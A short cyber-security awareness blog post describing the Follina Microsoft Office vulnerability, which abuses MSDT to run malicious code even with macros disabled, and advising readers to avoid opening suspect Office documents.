I have written about the usefulness and the threat that Microsoft Office document macros can pose to your cyber security. This flaw, called Follina, exploits Office functionality to retrieve an HTML file, and Microsoft Support Diagnostic Tool (MSDT) to run some malicious code, which can lead to privilege escalation attacks.
Microsoft Word struck by zero-day vulnerability • The Register
First Exploitation of Follina Seen in the Wild – SANS Internet Storm Centre
There is not effective technical defence against this attack at the moment.
The worse thing about this exploit is that it works even when macros are disabled. Having the macros disabled was a positive step in your cyber security defences, but it now appears that it is no longer good enough.
At the moment, Word documents that are using this attack appear to be blank, but that may not be the case going forward – but if you see the blank page, it is probably too late.
The best thing to do at the moment is to not open any marginally suspect Office documents – and to exercise extreme care when opening ones from even people you trust.
Clive Catton MSc (Cyber Security) – by-line and other articles
Further Reading
This is the same threat as discussed in this post – but less technical so we can all take steps to defend against it.
